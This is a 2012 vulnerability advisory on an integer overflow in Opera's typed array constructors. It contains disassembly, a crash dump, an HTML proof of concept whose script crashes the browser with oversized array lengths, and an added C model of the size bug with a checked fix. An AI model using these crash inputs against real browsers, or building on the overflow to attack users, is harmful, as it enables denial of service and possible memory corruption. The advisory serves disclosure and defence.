SECURITYVULNS:DOC:27619
Feb 08, 2012

[CAL-2012-0004] opera array integer overflow

1 Affected Products

11.60 and prior

2 Vulnerability Details

Code Audit Labs (http://www.vulnhunt.com) has discovered an integer
overflow vulnerability in array functions like
Int32Array, Int16Array, ….

The Opera vendor says: "We have reproduced the problem, and determined that it
does not have any security implications, since the crash is caused by
a memory fill operation which the webpage has no control over, and this
operation will always crash. It is therefore classified as a stability
issue, not a security issue."

We still insist that whether it is a security issue should depend on the
root cause of the bug, not on whether it is exploitable. Even if you
think it is unexploitable, someone may exploit it through deeper research.

So if most people in the security community think this is a security issue,
please assign a CVE number.

3 Analysis

Example: Int16Array(2147483647)
Memory corruption happens if the following conditions are satisfied:
1: x*2 > 2
2: x*2 != 0
3: (x*2-1)+0x1f overflows 32 bits.

So the length passed to malloc is (x*2-1)+0x1f,
and memset(eax+0x10,0,x*2) causes memory corruption.

text:5C769F57
text:5C769F57 loc_5C769F57: ; CODE XREF: sub_5C769DCE+17Cj
text:5C769F57 mov eax, [esp+48h+var_20] ; var_20 is 2
text:5C769F5B imul eax, [esp+48h+var_3C] ; var_3C is 80000001
text:5C769F60 cmp eax, [esp+48h+var_3C]
text:5C769F64 jb short loc_5C769F37
text:5C769F66 mov [esp+48h+size], eax
text:5C769F6A mov eax, [ebp+arg_0]
text:5C769F6D call sub_5C14A6E8
text:5C769F72 push [esp+48h+size] ; size
text:5C769F76 push dword ptr [eax] ; int
text:5C769F78 push [ebp+arg_0] ; int
text:5C769F7B call sub_5C765B6D
text:5C769F80 add esp, 0Ch

…

text:5C46A598
text:5C46A598 arg_0 = dword ptr 4
text:5C46A598 size = dword ptr 8
text:5C46A598
text:5C46A598 mov edx, [esp+arg_0]
text:5C46A59C push esi
text:5C46A59D mov esi, [esp+4+size]
text:5C46A5A1 test esi, esi
text:5C46A5A3 jz short loc_5C46A5AA
text:5C46A5A5 lea eax, [esi-1]
text:5C46A5A8 jmp short loc_5C46A5AC
text:5C46A5AA ;
text:5C46A5AA
text:5C46A5AA loc_5C46A5AA: ; CODE XREF: sub_5C46A598+Bj
text:5C46A5AA xor eax, eax
text:5C46A5AC
text:5C46A5AC loc_5C46A5AC: ; CODE XREF: sub_5C46A598+10j
text:5C46A5AC mov ecx, [edx+8]
text:5C46A5AF add eax, 1Fh
text:5C46A5B2 push 0
text:5C46A5B4 and eax, 0FFFFFFF8h
text:5C46A5B7 push eax
text:5C46A5B8 push edx
text:5C46A5B9 call sub_5C019DA0

text:5C765BF7 loc_5C765BF7: ; CODE XREF: sub_5C765B6D+50j
text:5C765BF7 push [ebp+size] ; size
text:5C765BFA lea eax, [ebx+10h]
text:5C765BFD push 0 ; c
text:5C765BFF push eax ; dst
text:5C765C00 call memset
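
The size arithmetic from the listings above, modeled in C as an added example (not code from the advisory or from Opera): it shows that the Int16Array(2147483647) request passes the one visible check yet gets a 0x18-byte allocation, and what a checked computation looks like. The function names, the DATA_OFFSET constant and the 64-bit checked variant are assumptions made for illustration.

```c
#include <stdint.h>
#include <stdio.h>

#define DATA_OFFSET 0x10u  /* memset destination in the listing is base+10h */

/* First listing: byte length = element size * count in a 32-bit register,
   guarded only by cmp/jb (reject when the product is below the count). */
static int byte_len_as_listed(uint32_t count, uint32_t elem, uint32_t *len)
{
    uint32_t prod = elem * count;        /* imul: high bits are discarded */
    if (prod < count) return 0;          /* jb short loc_5C769F37 */
    *len = prod;
    return 1;
}

/* Second listing: ((len ? len-1 : 0) + 1Fh) & 0FFFFFFF8h, still 32-bit. */
static uint32_t alloc_size_as_listed(uint32_t len)
{
    uint32_t eax = len ? len - 1u : 0u;  /* lea eax,[esi-1] / xor eax,eax */
    return (eax + 0x1Fu) & 0xFFFFFFF8u;  /* the add can wrap past 2^32 */
}

/* 1 when the zero-fill of len bytes at base+10h exceeds the allocation. */
static int fill_exceeds_alloc(uint32_t len)
{
    return (uint64_t)DATA_OFFSET + len > alloc_size_as_listed(len);
}

/* Hardened variant (an assumption, not Opera's fix): same formula in
   64 bits, refusing any request whose rounded size needs more than 32. */
static int checked_alloc_size(uint32_t count, uint32_t elem, uint32_t *size)
{
    uint64_t len = (uint64_t)count * elem;
    uint64_t total = ((len ? len - 1u : 0u) + 0x1Fu) & ~(uint64_t)7u;
    if (total > UINT32_MAX) return 0;
    *size = (uint32_t)total;
    return 1;
}

int main(void)
{
    uint32_t len = 0, size = 0;
    int ok = byte_len_as_listed(2147483647u, 2u, &len); /* Int16Array case */
    printf("accepted=%d len=0x%08x alloc=0x%x overrun=%d\n", ok,
           (unsigned)len, (unsigned)alloc_size_as_listed(len),
           fill_exceeds_alloc(len));
    printf("checked accepts=%d\n", checked_alloc_size(2147483647u, 2u, &size));
    return 0;
}
```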

4 Exploitable?

Who knows?

5 Crash info:

(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8 edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na pe cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010207
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Opera\Opera.dll -
Opera!OpGetNextUninstallFile+0x1961c:
675b347e 660f7f4150 movdqa xmmword ptr [ecx+50h],xmm0 ds:0023:03680000=???
0:000> .exr -1
ExceptionAddress: 675b347e (Opera!OpGetNextUninstallFile+0x0001961c)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 00000001
Parameter[1]: 03680000
Attempt to write to address 03680000
0:000> kp
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
02314e24 00000000 Opera!OpGetNextUninstallFile+0x1961c

6 POC:

Open an HTML file with the following content:

<script>
// crash
Int32Array(1073741823)
Float32Array(1073741823)
Float64Array(1073741823)
Int32Array(1073741823)
Uint32Array(1073741823)
Int16Array(2147483647)
ArrayBuffer(4294967295)
</script>

7 About Code Audit Labs:

Code Audit Labs secures your software and provides professional services,
including source code audit and binary code audit.
Code Audit Labs: "You create value for customer, We protect your value"
http://www.VulnHunt.com